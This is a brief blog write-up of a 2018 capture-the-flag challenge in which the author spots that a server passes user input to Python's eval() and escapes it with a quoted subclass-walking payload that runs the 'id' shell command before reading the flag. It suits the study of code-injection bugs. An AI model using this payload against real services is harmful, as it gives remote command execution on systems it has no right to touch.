Sunday, January 28, 2018

[MCSC] evilpython 50pts - Writeup[/PWN]

Now I going to write about evilpython pwn writeup from Myanmar Cyber Security Challenge 2018.



 
Hint - "Evil exists not only in hell"


Now time to test!
I just connect with my nc( netcat client ) to server that running evilpython.


first I submit "123" to server.
the server response back to me "123"
Now I try to submit some payload "1-2"
the server response back to me "-1", Opps!
why response back "-1".
And try to reconnect to server with nc and don't type anything just press Enter.
I got some error.


I know the backend running python script execute with eval function to our input variable age. 

evil_age = eval(age)

I quick look up in google and I found the python payload like that

"[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].__dict__.values()[144]('id')"


uid=1000(pyevil)

bingo! we executed "id" command to server, Now I need to find the flag in server.
the evil python script is running under pyevil user privilege, so the flag will be under pyevil home folder ( just I guess ), let search the flag in home folder.  



Now I found the flag path, let read the flag.


flag : mcsc{eval_is_s0_ev!l}



Thanks For reading.

This is second challenge that I solved in MCSC2018.
And the first solver team of that challenge, so we got another bonus (1 point ).

Note : I forget to read evil.py script!
I want to say thank you to Ko ******* who created this challenge.

No comments:

Post a Comment